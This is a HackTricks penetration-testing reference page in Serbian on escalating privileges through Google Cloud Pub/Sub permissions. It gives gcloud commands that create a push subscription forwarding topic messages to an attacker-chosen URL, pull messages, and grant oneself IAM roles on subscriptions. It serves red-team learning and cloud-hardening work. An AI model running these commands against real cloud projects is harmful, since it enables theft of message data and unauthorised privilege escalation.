GCP - Pubsub Privesc

Tip

Nauči & vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči & vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči & vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Pogledajte subscription plans!

Pridružite se 💬 Discord group or the telegram group or pratite nas na Twitter 🐦 @hacktricks_live.

Podelite hacking tricks slanjem PR-ova na HackTricks i HackTricks Cloud github repos.

PubSub

Više informacija potražite u:

GCP - Pub/Sub Enum

`pubsub.snapshots.create` (`pubsub.topics.attachSubscription`)

Snapshoti topic‑ova sadrže trenutne unACKed poruke i svaku poruku posle njih. Možete kreirati snapshot topic‑a da biste pristupili svim porukama, izbegavajući direktan pristup topic‑u.

gcloud pubsub subscriptions create <subscription_name> --topic <topic_name> --push-endpoint https://<URL_to_push_to>

`pubsub.snapshots.setIamPolicy`

Dodelite prethodne dozvole sebi.

`pubsub.subscriptions.create`

Možete kreirati push subscription na topic koji će slati sve primljene poruke na naznačeni URL

`pubsub.subscriptions.update`

Postavite svoj URL kao push endpoint da biste ukrali poruke.

`pubsub.subscriptions.consume`

Pristupite porukama koristeći subscription.

gcloud pubsub subscriptions pull <SUSCRIPTION> \
--limit=50 \
--format="json" \
--project=<PROJECTID>

`pubsub.subscriptions.setIamPolicy`

Dodelite sebi bilo koju od prethodnih dozvola

# Add Binding
gcloud pubsub subscriptions add-iam-policy-binding <SUSCRIPTION_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"

# Remove Binding
gcloud pubsub subscriptions remove-iam-policy-binding <SUSCRIPTION_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"

# Change Policy
gcloud pubsub subscriptions set-iam-policy <SUSCRIPTION_NAME> \
<(echo '{
"bindings": [
{
"role": "<ROLE_OR_CUSTOM_ROLE>",
"members": [
"serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com"
]
}
]
}') \
--project=<PROJECT_ID>

Tip

Nauči & vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči & vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči & vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Pogledajte subscription plans!

Pridružite se 💬 Discord group or the telegram group or pratite nas na Twitter 🐦 @hacktricks_live.

Podelite hacking tricks slanjem PR-ova na HackTricks i HackTricks Cloud github repos.